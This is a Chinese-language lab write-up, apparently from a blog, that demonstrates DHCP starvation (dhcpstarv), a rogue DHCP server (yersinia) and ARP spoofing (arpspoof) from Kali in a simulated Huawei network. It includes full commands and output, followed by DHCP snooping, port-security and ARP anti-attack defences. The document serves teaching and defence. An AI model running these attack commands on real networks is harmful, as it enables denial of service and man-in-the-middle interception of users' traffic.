1.1 饿死攻击:耗尽DHCP地址池
图 1-1 DHCP攻击网络拓扑
1.R1配置DHCP服务器
dhcp enable
interface GigabitEthernet0/0/0
ip address 192.168.100.1 255.255.255.240
dhcp select interface
#查看地址池信息
display ip pool
Pool-name : GigabitEthernet0/0/0/0
Pool-No : 0
Position : Interface Status : Unlocked
Gateway-0 : 192.168.100.1
Mask : 255.255.255.240
VPN instance : --
IP address Statistic
Total :13
Used :0 Idle :13
Expired :0 Conflict :0 Disable :0
#查看地址池详细信息
display ip pool interface GigabitEthernet0/0/0/0
Pool-name : GigabitEthernet0/0/0/0
Pool-No : 0
Lease : 1 Days 0 Hours 0 Minutes
Domain-name : -
DNS-server0 : -
NBNS-server0 : -
Netbios-type : -
Position : Interface Status : Unlocked
Gateway-0 : 192.168.100.1
Mask : 255.255.255.240
VPN instance : --
Start End Total Used Idle(Expired) Conflict Disable
192.168.100.1 192.168.100.14 13 0 13(0) 0 0
#查看地址池所有详细信息
display ip pool interface GigabitEthernet0/0/0/0 all
1 192.168.100.2 - - Idle
2 192.168.100.3 - - Idle
3 192.168.100.4 - - Idle
4 192.168.100.5 - - Idle
5 192.168.100.6 - - Idle
6 192.168.100.7 - - Idle
7 192.168.100.8 - - Idle
8 192.168.100.9 - - Idle
9 192.168.100.10 - - Idle
10 192.168.100.11 - - Idle
11 192.168.100.12 - - Idle
12 192.168.100.13 - - Idle
13 192.168.100.14 - - Idle
2.PC机设置自动获取IP地址
PC>ipconfig
Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.100.14
Subnet mask.......................: 255.255.255.240
Gateway...........................: 192.168.100.1
Physical address..................: 54-89-98-E4-18-90
DNS server........................:
3.路由器查看地址池所有详细信息
display ip pool interface GigabitEthernet0/0/0/0 all
1 192.168.100.2 - - Idle
2 192.168.100.3 - - Idle
3 192.168.100.4 - - Idle
4 192.168.100.5 - - Idle
5 192.168.100.6 - - Idle
6 192.168.100.7 - - Idle
7 192.168.100.8 - - Idle
8 192.168.100.9 - - Idle
9 192.168.100.10 - - Idle
10 192.168.100.11 - - Idle
11 192.168.100.12 - - Idle
12 192.168.100.13 - - Idle
13 192.168.100.14 5489-98e4-1890 36 Used
4.kali服务器连接cloud设置
5.SW1配置
#SW1关闭生成树
stp disable
#DHCP-SERVER服务器重新开启DHCP服务
interface GigabitEthernet0/0/0
undo dhcp select interface
dhcp select interface
6.kali发起攻击
#查看网络信息
┌──(root💀kali)-[~/Desktop]
└─# ip addr
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:e2:b3:f4 brd ff:ff:ff:ff:ff:ff
inet 192.168.11.100/24 brd 192.168.11.255 scope global eth0
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:e2:b3:fe brd ff:ff:ff:ff:ff:ff
inet 192.168.8.137/24 brd 192.168.8.255 scope global dynamic eth1
valid_lft 1160sec preferred_lft 1160sec
#发起DHCP攻击
┌──(root💀kali)-[~/Desktop]
└─# dhcpstarv -i eth0
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.14 for 00:16:36:65:6f:03 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.13 for 00:16:36:0c:1d:5d from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.12 for 00:16:36:06:7f:cb from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.11 for 00:16:36:25:b5:f5 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.10 for 00:16:36:c9:e4:20 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.9 for 00:16:36:37:b0:87 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.8 for 00:16:36:b5:46:df from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.7 for 00:16:36:d1:d9:23 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.6 for 00:16:36:2f:78:c4 from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.5 for 00:16:36:dc:d5:4a from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.4 for 00:16:36:35:dd:bd from 192.168.100.1
16:34:44 07/20/23: no network mask option in DHCPOFFER
16:34:44 07/20/23: got address 192.168.100.3 for 00:16:36:cb:83:5c from 192.168.100.1
16:34:45 07/20/23: no network mask option in DHCPOFFER
16:34:45 07/20/23: got address 192.168.100.2 for 00:16:36:6e:8c:97 from 192.168.100.1
7.DHCP服务器查看地址信息
display ip pool interface GigabitEthernet0/0/0/0 all
1 192.168.100.2 0016-366e-8c97 106 Used
2 192.168.100.3 0016-36cb-835c 106 Used
3 192.168.100.4 0016-3635-ddbd 106 Used
4 192.168.100.5 0016-36dc-d54a 107 Used
5 192.168.100.6 0016-362f-78c4 107 Used
6 192.168.100.7 0016-36d1-d923 107 Used
7 192.168.100.8 0016-36b5-46df 107 Used
8 192.168.100.9 0016-3637-b087 107 Used
9 192.168.100.10 0016-36c9-e420 107 Used
10 192.168.100.11 0016-3625-b5f5 107 Used
11 192.168.100.12 0016-3606-7fcb 107 Used
12 192.168.100.13 0016-360c-1d5d 107 Used
13 192.168.100.14 0016-3665-6f03 119 Used
1.2 DHCP server 仿冒攻击
1.仿冒攻击
┌──(root💀kali)-[~/Desktop]
└─# yersinia -G
2.抓包
3.PC机查看地址
PC>ipconfig
Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.11.200
Subnet mask.......................: 255.255.255.0
Gateway...........................: 192.168.11.100
Physical address..................: 54-89-98-E4-18-90
DNS server........................: 192.168.11.100
1.3 DHCP 攻击防范
1.DHCP server 仿冒攻击防范
1)重新恢复DHCP服务
interface GigabitEthernet0/0/0
[DHCP-SERVER-GigabitEthernet0/0/0]undo dhcp select interface
Warning: There are IP addresses allocated in the pool. Are you sure to delete the pool?[Y/N]:y
[DHCP-SERVER-GigabitEthernet0/0/0] dhcp select interface
display ip pool interface GigabitEthernet0/0/0/0 all
1 192.168.100.2 - - Idle
2 192.168.100.3 - - Idle
3 192.168.100.4 - - Idle
4 192.168.100.5 - - Idle
5 192.168.100.6 - - Idle
6 192.168.100.7 - - Idle
7 192.168.100.8 - - Idle
8 192.168.100.9 - - Idle
9 192.168.100.10 - - Idle
10 192.168.100.11 - - Idle
11 192.168.100.12 - - Idle
12 192.168.100.13 - - Idle
13 192.168.100.14 - - Idle
2)SW1开启dhcp snooping及信任端口
dhcp enable
dhcp snooping enable
vlan 1
dhcp snooping enable
#添加信任端口
dhcp snooping trusted interface GigabitEthernet 0/0/2
3)PC机查看地址信息
PC>ipconfig
Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.100.14
Subnet mask.......................: 255.255.255.240
Gateway...........................: 192.168.100.1
Physical address..................: 54-89-98-E4-18-90
2.DHCP server 饿死攻击防范
1)SW1开启DHCP snooping + dhcp snooping check chaddr 丢弃该消息
port-group 1
group-member GigabitEthernet 0/0/1 to GigabitEthernet 0/0/24
#开启dhcp snooping check功能
dhcp snooping check dhcp-chaddr enable
#进入G0/0/3查看
interface GigabitEthernet0/0/3
dhcp snooping check dhcp-chaddr enable
2)发起dhcpstarv饿死攻击
3)查看DHCP信息
MAC地址和chaddr不同,则认为是攻击,开启DHCP snooping + dhcp snooping check chaddr 丢弃该消息
4)PC机查看地址信息
PC>ipconfig
Link local IPv6 address...........: fe80::5689:98ff:fee4:1890
IPv6 address......................: :: / 128
IPv6 gateway......................: ::
IPv4 address......................: 192.168.100.14
Subnet mask.......................: 255.255.255.240
Gateway...........................: 192.168.100.1
Physical address..................: 54-89-98-E4-18-90
DNS server........................:
3.发起yersinia 攻击
1)Yersinia DHCP DOS攻击
Yersinia DHCP DOS攻击,MAC地址和chaddr地址相同,Yersinia DHCP DOS攻击 防范 无法通过CHECK-CHADDR实现
2)通过端口安全方式实现防范
Yersinia伪造,SOURCE-MAC和CHADDR全部伪造,Yersinia攻击会让交换机端口学习到大量MAC地址。在一个交换机的一个access接口下,只允许一个MAC学习。如果学习到多个,那么则对端口进行惩罚,惩罚方式-关闭接口shutdown。
port-group 1
#开启安全
port-security enable
#设置最大MAC地址数量
port-security max-mac-num 1
#开启安全保护(关闭)
port-security protect-action shutdown
#关闭保护需要重新开启端口
interface GigabitEthernet 0/0/3
undo shutdown
1.4 ARP攻击防范
1.ARP攻击
1)R2配置
interface GigabitEthernet0/0/0
ip address 192.168.11.101 24
ip route-static 0.0.0.0 0.0.0.0 192.168.11.199
ping 192.168.11.199
Reply from 192.168.11.199: bytes=56 Sequence=1 ttl=255 time=140 ms
display arp
192.168.11.101 5489-98e6-7f25 I - GE0/0/0
192.168.11.199 5489-9879-755b 20 D-0 GE0/0/0
2)R3配置
interface GigabitEthernet0/0/0
ip address 192.168.11.199 24
dis arp
192.168.11.199 5489-9879-755b I - GE0/0/0
192.168.11.101 5489-98e6-7f25 20 D-0 GE0/0/0
3)SW1关闭端口安全
interface GigabitEthernet 0/0/3
undo port-security enable
4)KALI发起dsniff攻击
┌──(root💀kali)-[~/Desktop]
└─# ip add
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:e2:b3:f4 brd ff:ff:ff:ff:ff:ff
inet 192.168.11.100/24 brd 192.168.11.255 scope global eth0
valid_lft forever preferred_lft forever
┌──(root💀kali)-[~/Desktop]
└─# arpspoof
Version: 2.4
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
┌──(root💀kali)-[~/Desktop]
└─# arpspoof -i eth0 -t 192.168.11.101 -r 192.168.11.199 130 ⨯
0:c:29:e2:b3:f4 54:89:98:e6:7f:25 0806 42: arp reply 192.168.11.199 is-at 0:c:29:e2:b3:f4
0:c:29:e2:b3:f4 54:89:98:79:75:5b 0806 42: arp reply 192.168.11.101 is-at 0:c:29:e2:b3:f4
4)R2查看错误的ARP表
dis arp
192.168.11.101 5489-98e6-7f25 I - GE0/0/0
192.168.11.199 000c-29e2-b3f4 20 D-0 GE0/0/0
192.168.11.100 000c-29e2-b3f4 15 D-0 GE0/0/0
5)R3查看错误的ARP表
192.168.11.199 5489-9879-755b I - GE0/0/0
192.168.11.101 000c-29e2-b3f4 20 D-0 GE0/0/0
192.168.11.100 000c-29e2-b3f4 15 D-0 GE0/0/0
2.RP中间人攻击防范 – 防范技术DHCP-SNOOPING
1)DHCP-SNOOPING开启之后-交换机创建DHCP-SNOOPING表五元素表(包含IP、MAC、VLAN接口、interface-DHCP、租期)
display dhcp snooping user-bind all
192.168.100.14 5489-98e4-1890 1 /-- /-- GE0/0/1 2023.07.21-12:35
2)开启ARP ANTI-ATTACK命令
#VLAN下开启
vlan 1
arp anti-attack check user-bind enable
#接口下开启
interface GigabitEthernet 0/0/3
arp anti-attack check user-bind enable
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容